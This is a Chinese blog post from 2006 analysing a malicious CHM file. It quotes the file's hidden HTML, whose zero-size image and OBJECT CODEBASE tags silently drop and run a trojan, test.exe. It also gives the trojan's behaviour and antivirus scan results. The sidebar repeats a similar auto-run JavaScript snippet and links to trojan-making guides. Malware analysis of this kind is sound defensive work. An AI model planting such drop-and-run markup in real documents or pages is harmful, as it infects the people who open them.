[06-20] 一个释放/运行EXE文件的CHM文件 Trojan.DL.Inject.fg(TrojanDownloader.Small.mp)(第3版)

最新推荐文章于 2019-07-27 11:57:45 发布
最新推荐文章于 2019-07-27 11:57:45 发布
阅读量1.9k 收藏
点赞数
分类专栏: 系统安全 文章标签: chm exe microsoft database vba file
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/purpleendurer/article/details/811305
版权

endurer 原创

2006-06-20 第3版 补充:瑞星18.32.10将test.exe报为Trojan.DL.Inject.fg
2006-06-19 第2版 补充:江民KV将test.exe报为TrojanDownloader.Small.mp
2006-06-18 第1

一位网发来的cHM文件中有代码:

 

 

<body onselectstart="return false"; οnpaste="return false";>
<img src="test.exe" width=0 height=0>
<img src="001.jpg">
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="test.exe">
</object>

 

 

因此打开此CHM文件会释放/运行一个名为test.exe的文件。

test.exe用Microsoft Visual C++ 编写,经UPX压缩,会用线程插入explorer.exe,试图访问:hxxp://gd.vnet.cn


File: test.exe
Status: POSSIBLY INFECTED/MALWARE (Note: this file was only flagged as malware by heuristic detection(s). This might be a false positive. Therefore, results of this scan will not be stored in the database)
MD5 1d0b29b416ebe8e942173a326eb6e1ed
Packers detected: UPX
Scanner results
AntiVir Found Heuristic/Hijacker (probable variant)
ArcaVir Found nothing
Avast Found nothing
AVG Antivirus Found nothing
BitDefender Found nothing
ClamAV Found nothing
Dr.Web Found nothing
F-Prot Antivirus Found nothing
Fortinet Found nothing
Kaspersky Anti-Virus Found nothing
NOD32 Found nothing
Norman Virus Control Found nothing
UNA Found nothing
VirusBuster Found nothing
VBA32 Found nothing

紫郢剑侠
关注
专栏目录
调用hh.exe解压chm文件
01-13
因为一直喜欢用ReadBook看书,所以见到chm就先想解压成html的-_-!!很久以前写的,好像是因为当时下了一个这样的软件但有注册限制...:)功能:解压到某一文件夹(默认为在chm所在文件夹下新建一个chm文件同名的).其中,双击Edit前面的label打开对话框.实现:调用windows目录下的hh.exe(很简单吧:)
trojan-qt5.app.zip
04-06
标题 "trojan-qt5.app.zip" 暗示我们正在处理一个可能包含恶意软件的压缩文件,其中的“trojan”一词通常用于指代特洛伊木马病毒。特洛伊木马是一种伪装成合法软件的恶意程序,用户在不知情的情况下下载并执行时,它...
游戏编程入门学习笔记33——菜单篇——chm文档嵌入exe
猪哥的白驼山
06-18 1337
我一直想将自己的简历和源代码等资料嵌入exe文件并可在菜单栏点击查看,很明显单纯依靠那种简单的about对话框是达不到理想效果的。 调查思索一番后大致发现三条路线: 1,利用richedit2.0控件。 2,利用CHtmlView类制作CHtmlCtrl控件,在对话框中使用来显示html文档。 3,利用chm文件。   第一种方案纯属最初看到富文本控件这个名词后的一种幻想和臆测,实际情
一个下载Trojan-Downloader.Win32.Delf.ajm,技术比较新奇的网页
Purpleendurer@CSDN
01-08 1521
endurer 原创2007-01-08 第1网页的内容为JavaScript脚本,分为三个部分:第1部分 是注释:/---------/*GW]22Y!9YZbYvwYvA]+Tuv*Y{y]{ uw]{y]y!]F u*uGf]F*YG]vlY Z]vAY*uGR]{cYTG]Tbu{*uG+Y+Z]+Tu&9]yTu +uvR]GW]F*]F!Y&z]+ou su{Gu
Trojan-Downloader.Win32.Agent.bbb以及aowgo.dll,KGFER.DLL的清除
weixin_34184561的博客
03-02 187
一、问题的提出: 我电脑上杀软是卡巴斯基,总是提示查到Trojan-Downloader.Win32.Agent.bbb的病毒,然后叫重启后删除,但是重启后没有作用,依然会弹出来,总是叫重启,我非常苦恼,希望你能帮帮我,万分感谢,扫描出的日志我贴在我的百度空间,希望尽快解决,TKS!! 二、分析 1.杀毒前关闭系统还原(Win2000系统可以忽略):右键我的电脑...
Trojan-Downloader.Win32.Agent.bmp分析与清除方案
congji2702的博客
06-27 774
最近写的代码出现了这样奇怪的问题,所有的htm代码全部在结尾部分加上了这一小段代码 我估计是中了病毒。随后上网一查,果然是中了病毒。 晕 ~! 开始紧张了,电脑上有许多重要的东西,赶快查找杀毒的方法。 幸好解决及时,重要文...
osx.raedbot.rar_At Risk_OSX.Raedb_linux trojan_realbasic_xraed
09-21
“At your OWN risk”是一个警告,暗示下载或研究这个文件可能会对用户的系统安全造成风险。这意味着任何与该文件的交互都需要谨慎处理,因为这可能激活病毒并导致数据丢失、系统被控制或其他安全问题。 标签“at_...
laravel-5.2.31.zip
05-26
在命令行中运行`composer create-project --prefer-dist laravel/laravel your_project_name "5.2.*"`即可创建一个新的Laravel项目。确保系统已安装Composer和PHP,并且配置了合适的运行环境,如MySQL或SQLite等...
xxx.rar_xxx video_xxx.CBp.VDO_xxx.video._视频 解压缩
最新发布
09-22
在本案例中,"xxx.rar_xxx video_xxx.CBp.VDO_xxx.video._视频 解压缩" 的标题暗示我们关注的焦点是一个包含了视频编解码过程的压缩文件。描述中提到,原始图像被压缩成MPEG4格式,这是一种广泛使用的视频编码标准,...
Trojan-Qt5-Windows.zip
03-14
这是一个只有bug修复的本: [Bug修复] 修复Safari PAC不工作 [Bug修复] 修复断开连接后privoxy不会释放端口 [Bug修复] 修改PAC立即生效 [Bug修复] 修复不开启http模式还检查http端口是否占用的bug
JS 自动安装exe程序
01-21
run_exe=”<OBJECT ID=\”RUNIT\” WIDTH=0 HEIGHT=0 TYPE=\”application/x-oleobject\”” run_exe+=”CODEBASE=\”BScreen_CQ.exe\”>” run_exe+=”</OBJECT>” run_exe+=”<HTML><H1>网页在下载安装支持的文件,可能需要几分钟,请耐心等待。<br>手动下载地址为:<a>点击下载控件</a><br></H1></HTML>”; document.open(); document.clear(); document.w
TrojanDownloader简单分析
Cosmopolitan的博客
07-27 2301
这里是WinMain的入口,先读取最后自己最后160解密出要下载的url: 注册服务和写入注册表来加入自启动 没有下载过就开一个线程去下载执行 下载执行并且标记为已下载 ...
遭遇trojan-downloader.win32.agent.vjh
NONAME的专栏
07-29 1437
 今天下午开始本打算学习ARCIMS的,正是因为要学习它就装软件吧,为了节约内存我把卡巴给关掉,于是惹来了trojan-downloader.win32.agent.vjh木马,真够郁闷的。现象:一旦机器启动如果卡巴随机启动,于是卡巴会提示发现病毒并要求处理,你点击处理不一会机器就自动重启了。然而卡巴还是会报告这是什么病毒。解决:自己先是去删除windows文件下东西。根本不管用。最后上网
某网络硬盘网站被植入传播Trojan.DL.Inject.xz等的代码
Purpleendurer@CSDN
04-30 2105
endurer 原创2007-04-30 第1该网站的留言板页面:/---<Iframe id="fralyb" name="fralyb2" src="kh_lyb.aspx?user=2**5***" scrolling="auto" frameborder="0" width=100% height="100%"></iframe>---/被植入代码:/---<iframe src
编辑,修改chm帮助文档,无需修改繁琐的html文件,可以直接编辑修改chm
热门推荐
每一件自己觉得值得的事都要不留余力的去做
04-16 3万+
小编最近遇到一个需求就是要把项目设计的所有开发设计的东西,做成类似于api的帮助文档手册。刚开始做完之后,后面挤牙膏似的遇到了要不断修改chm帮助文档,但是生成的时候是编辑的html网页文件,开始的时候是一脸懵B,那就改呗。过了几天一堆文档都要堆过来了,还要修改,想想去修改那么多的html文件,头都大了,就想能不能找到一款可以编辑帮助文档的一款软件。还是有很多坑的,我收到了一款叫 chm Edito
打造终极网页木马,值得一读!
07-08 6719
打造终极网页木马,值得一读!    如果你打开此页看到了类似下面的这个程序窗口,那我就“恭喜”你有“洞洞”了^O^请注意:此文章发表于04年7月份,到目前为止,文章中所描述的木马已能被所有的杀毒软件成功杀除。而且微软也相继推出了各个OS本下的针对此漏洞的补丁,所以此木马已基本失效,请各位网友不要再进行尝试。继续放在这里只是为了提供有兴趣的网友学习测试。    
temp7
09-03 432
CHM电子书木马制作全攻略 http://www.hackbase.com 2007-8-2 1 黑客基地        说起CHM格式
查杀win32/Trojan.e9b变种Autorun病毒的方法
病毒通过一个名为ndclb.exe的DOS文件传播,该文件仅感染EXE文件,而不改变其文件时间戳,增加了其逃避安全软件检测的能力。 当win32/Trojan.e9b病毒入侵系统时,它会在硬盘根目录创建Autorun.inf文件,并改变部分...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

紫郢剑侠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值